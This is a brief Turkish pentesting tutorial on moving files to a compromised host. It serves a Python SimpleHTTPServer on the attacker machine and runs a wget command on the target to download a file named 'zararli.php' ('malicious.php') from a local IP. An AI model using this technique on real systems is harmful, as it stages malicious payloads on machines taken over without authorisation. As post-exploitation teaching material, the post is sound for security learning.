TR | Python SimpleHTTPServer & WGET
Bir sızma testinde hedef sistem üzerinde bazı zafiyetler yakalayarak bir bağlantı elde etmiş, hatta shell almış olabilirsiniz ancak elinizde ki bağlantı hedef sisteme dosya upload etmenize olanak vermediği durumlarla karşılaşabilirsiniz.
Basit bir örnek vermek gerekirse SSH bağlantısı elde etmişsiniz fakat scp komutuna verecek bir root paralanız olmayabilir. Bu durumda hedefe dosya aktarmanın basit bir yolu var.
Python’un SimpleHTTPServer modülü çalıştırıldığı dizinde bir HTTP servisi başlatır. (apache servisi başlatılması gerekmez) Hedefe aktarmak istediğimiz dosyanın bulunduğu dizinde bir SimpleHTTPServer başlatalım…
python -m SimpleHTTPServer 8080
Artık 8080 portu üzerinde bir HTTP server çalışıyor ve sadece Desktop dizinine erişebiliyor, Desktop da “zararli.php” adında bir dosya var ve hedef sistemde bu dosyayı çekecek bir komut çalıştırmamız gerekli
Wget
wget http://192.168.1.36:8080/zararli.php
192.168.1.36 SimpleHTTPServer başlattığımız makinanın IP adresidir.